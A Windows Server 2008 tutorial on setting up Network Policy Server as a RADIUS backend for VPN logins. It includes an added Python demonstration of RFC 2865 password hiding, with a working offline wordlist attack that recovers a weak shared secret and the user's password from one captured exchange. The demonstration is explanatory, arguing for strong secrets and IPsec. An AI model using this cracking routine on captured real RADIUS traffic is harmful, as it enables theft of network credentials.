The usual way to authenticate and authorize virtual private network (VPN) connections is RADIUS. Microsoft ships all of the necessary RADIUS components with Windows Server but has never called the product RADIUS. In Windows Server 2003, Microsoft's RADIUS implementation was the Internet Authentication Service, better known as IAS. In Windows Server 2008, the same functionality is provided by the Network Policy Server (NPS).
Deploying a Network Policy Server
The Network Policy Server is not installed on Windows Server 2008 by default; you have to add it. To do so, open Server Manager and click the Add Roles link. When prompted, select the Network Policy and Access Services role and click Next. You should now see an introductory screen describing the services you are about to install. Click Next to bypass this screen.
The next screen asks which role services you want to install. Since our goal is to provide RADIUS authentication for a VPN connection on Windows Server 2008, choose the Network Policy Server option, as shown in Figure A.
Figure A: Choose the Network Policy Server option, and click Next.
Click Next, and you should see a summary screen confirming that you are about to install the Network Policy and Access Services and the Network Policy Server role service. Assuming that everything appears to be correct, click the Install button. When the installation process completes, click Close.
Registering the Network Policy Server
Before you can use the Network Policy Server to authenticate VPN connections, you must register the server in Active Directory (the server should already be a domain member). To do so, choose the Network Policy Server command from the server's Administrative Tools menu. When the Network Policy Server (NPS) console opens, right-click the NPS node and choose the Register Server in Active Directory option from the shortcut menu, as shown in Figure B.
Figure B: Choose the Register in Active Directory command.
You should now see a prompt informing you that before the Network Policy Server can authenticate Active Directory users, it must be authorized to read users' dial-in properties. The dialog box then asks whether you want to grant the necessary authorization. Click OK. When you do, you should receive confirmation that the server is now authorized to read users' dial-in properties from the domain (behind the scenes, this adds the server's computer account to the RAS and IAS Servers group). Click OK to clear this message.
Although connection request logging is enabled by default, it's a good idea to verify that logging is indeed enabled, because the NPS event log is where you will find out why a VPN user was rejected. To do so, right-click the NPS node and choose the Properties command from the shortcut menu. When you do, you will see the Network Policy Server (Local) Properties sheet, shown in Figure C.
Figure C: Verify that logging is enabled.
Take a moment to verify that Rejected Authentication Requests and Successful Authentication Requests are both selected. Next, select the Ports tab. The ports should be filled in automatically, but verify that the server is listening on UDP ports 1812 and 1645 for authentication and on UDP ports 1813 and 1646 for accounting. Ports 1812 and 1813 are the standard RADIUS ports defined in RFC 2865 and RFC 2866; 1645 and 1646 are the older, pre-standard ports that NPS keeps for the benefit of legacy RADIUS clients. Whichever pair your VPN server uses, make sure any firewall between it and the NPS server permits that UDP traffic.
Set up a RADIUS client
Now we need to set up a RADIUS client. The RADIUS client is the device (here, the VPN server) that forwards authentication requests to our Network Policy Server; it is not the end user's computer. To set up a RADIUS client, navigate through the console tree to Network Policy Server | RADIUS Clients and Servers | RADIUS Clients. Right-click the RADIUS Clients node and select the New command from the shortcut menu. You should then see the dialog box shown in Figure D.
Figure D: You must configure a RADIUS client.
At its simplest, you must provide a friendly name for the RADIUS client and specify its IP address. You must also provide a shared secret that is known to both the Network Policy Server and the RADIUS client. NPS will only accept requests from the configured address, and only if they were built with the matching secret, so use a long, random secret, use a different one for each client, and treat it as a credential: the RADIUS protocol uses it only to obscure the User-Password attribute and to sign the server's replies, and everything else in the exchange (user name, NAS address, and so on) travels in the clear. It's also worth selecting the Access-Request messages must contain the Message-Authenticator attribute option, which makes NPS discard requests that are not integrity-protected with the secret.
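To make concrete what the shared secret does and does not protect, here is an added Python example that is not part of the original article and is not Microsoft's code. It implements the RFC 2865 User-Password hiding and Response Authenticator that the RADIUS client (the VPN server) and NPS use on UDP 1812, then shows that a short, guessable secret can be recovered offline from a single captured Access-Request/Access-Accept pair, which in turn exposes the user's password. The user name, password, NAS address, secrets and wordlist are all constructed for the example.

```python
"""RFC 2865 shared-secret primitives (added example; constructed data, not a capture)."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP_ADDRESS = 1, 2, 4


def attr(attr_type: int, value: bytes) -> bytes:
    """Encode one attribute as Type, Length (header included), Value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def parse_attrs(attributes: bytes) -> dict:
    """Walk the attribute list back into a {type: value} dict (what NPS does on receipt)."""
    out, i = {}, 0
    while i < len(attributes):
        attr_type, length = attributes[i], attributes[i + 1]
        out[attr_type] = attributes[i + 2:i + length]
        i += length
    return out


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 section 5.2: pad with NULs to a 16-byte multiple (at least 16), then
    XOR each block with MD5(secret + previous block), seeded by the Request Authenticator."""
    padded = password.ljust(max(16, (len(password) + 15) // 16 * 16), b"\x00")
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], pad))
        out, prev = out + block, block
    return out


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: what NPS does before checking the password against AD."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out, prev = out + bytes(c ^ k for c, k in zip(block, pad)), block
    return out.rstrip(b"\x00")  # removes the RFC padding (and any genuine trailing NULs)


def response_authenticator(code: int, ident: int, request_auth: bytes,
                           attributes: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attributes))
    return hashlib.md5(header + request_auth + attributes + secret).digest()


def client_access_request(username: bytes, password: bytes, secret: bytes, ident: int):
    """What the VPN server (RADIUS client) sends to NPS. Returns (request_auth, attributes);
    the datagram is the 4-byte header + request_auth + attributes. NAS IP is constructed."""
    request_auth = os.urandom(16)
    attributes = (attr(ATTR_USER_NAME, username)
                  + attr(ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
                  + attr(ATTR_NAS_IP_ADDRESS, bytes([192, 0, 2, 10])))
    return request_auth, attributes


def server_accept(ident: int, request_auth: bytes, secret: bytes) -> bytes:
    """NPS replies with an Access-Accept (no attributes here) signed with the secret."""
    return response_authenticator(ACCESS_ACCEPT, ident, request_auth, b"", secret)


def recover_secret(candidates, ident: int, request_auth: bytes, captured_response_auth: bytes):
    """Offline attack on a captured pair: the candidate that reproduces the Access-Accept's
    Response Authenticator is the shared secret. No interaction with NPS is needed."""
    for candidate in candidates:
        guess = response_authenticator(ACCESS_ACCEPT, ident, request_auth, b"", candidate)
        if hmac.compare_digest(guess, captured_response_auth):
            return candidate
    return None


def demo(secret: bytes = b"radius1", password: bytes = b"Pa55w0rd!") -> dict:
    """Run one exchange as both sides, then as an eavesdropper with a small wordlist."""
    ident = 7
    request_auth, req_attrs = client_access_request(b"alice", password, secret, ident)
    attrs = parse_attrs(req_attrs)  # User-Name and NAS-IP-Address are readable by anyone
    seen_by_server = reveal_password(attrs[ATTR_USER_PASSWORD], secret, request_auth)
    accept_auth = server_accept(ident, request_auth, secret)
    wordlist = [b"password", b"secret", b"radius1", b"radius123"]  # constructed
    cracked = recover_secret(wordlist, ident, request_auth, accept_auth)
    recovered_pw = (reveal_password(attrs[ATTR_USER_PASSWORD], cracked, request_auth)
                    if cracked is not None else None)
    return {"username_in_clear": attrs[ATTR_USER_NAME], "server_sees": seen_by_server,
            "cracked_secret": cracked, "recovered_password": recovered_pw}


if __name__ == "__main__":
    print(demo())
    print(demo(secret=os.urandom(24).hex().encode()))  # long random secret: nothing cracked
```

The second call in the usage block uses a 48-character random secret, and the wordlist attack finds nothing, while with the short secret it recovers both the secret and the user's password from one captured exchange. That asymmetry is the whole reason for choosing the shared secret carefully, and for tunnelling RADIUS over IPsec when the VPN server and NPS are not on the same trusted segment.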
The last step in the process is to set up a network policy. To do so, navigate through the console tree to NPS | Policies | Network Policies. When you select the Network Policies container, you will see two default policies, which deny access to everyone and can be ignored. Right-click the Network Policies container and select the New command from the shortcut menu.
Windows will now launch the new Network Policy wizard. Enter a name for the policy you are creating, and set the Type of Network Access Server option to Remote Access Server (VPN-Dial Up).
Click Next, and the wizard will display the Conditions screen. You must specify at least one condition that will determine whether or not the policy will be evaluated for network requests. To do so, click Add and then select the condition that you want to use. As you can see in Figure E, there are too many conditions available to include in one screen capture.
Figure E: You must select a condition.
Although there are options for evaluating a connection based on security group membership, VPN connections are most commonly evaluated based on tunnel type. That way, you can be sure that the policy will be applied only to VPN clients. Tunnel type alone says nothing about who is connecting, though, so in practice you will usually pair it with a Windows Groups condition so that only members of a dedicated VPN users group match the policy. Of course, the actual conditions you choose must be based on your own requirements.
Regardless of your choice, you will be asked to provide some information about the condition. For example, if you choose to use the Tunnel Type option, then you will be required to choose the types of tunnels to which the policy should be applied, as shown in Figure F.
Figure F: Choose the type of tunnel to which the policy should be applied.
When you have finished setting up your conditions, click Next. Windows will now display the wizard's Specify Access Permission screen, shown in Figure G. This is where you choose whether connections matching the conditions you have specified should be granted or denied access. Normally, you should choose Access granted and leave the Access is determined by User Dial-in properties option selected, so that a Deny Access setting on an individual account in Active Directory Users and Computers still overrides the policy.
Figure G: Choose to grant or deny access to connections matching the specified conditions.
Click Next, and you will be taken to the Configure Constraints screen. Use this screen to choose the permitted authentication methods and to set idle timeouts, session timeouts, and day and time restrictions. The authentication methods deserve the most attention: clear the checkboxes for PAP, CHAP and MS-CHAP (version 1) unless a client genuinely needs them, and leave only MS-CHAP v2 or an EAP type. Make any desired settings and click Next.
You should now see a screen that allows you to send optional additional attributes back to RADIUS clients. In most cases you won't need to do anything here unless your VPN devices (the RADIUS clients) expect vendor-specific attributes. This screen exists primarily for those who are going to be using Network Access Protection or RADIUS clients with special requirements. Since we do not need to add additional attributes, just click Next.
Windows will now display a summary of the configuration options that you have specified. Assuming that everything appears correctly, click Finish to complete the configuration process.
Concluding your Windows Server 2008 RADIUS authentication
As you can see, implementing RADIUS authentication for a VPN on Windows Server 2008 is fairly straightforward. However, this procedure is not one size fits all. Depending on your own requirements, you may have to perform additional steps.
Brien M. Posey
About the author:
Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. Brien has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. As a freelance technical writer, he has written for Microsoft, CNET, ZDNet, TechTarget, MSD2D, Relevant Technologies and other technology companies. You can visit Brien's personal website at www.brienposey.com.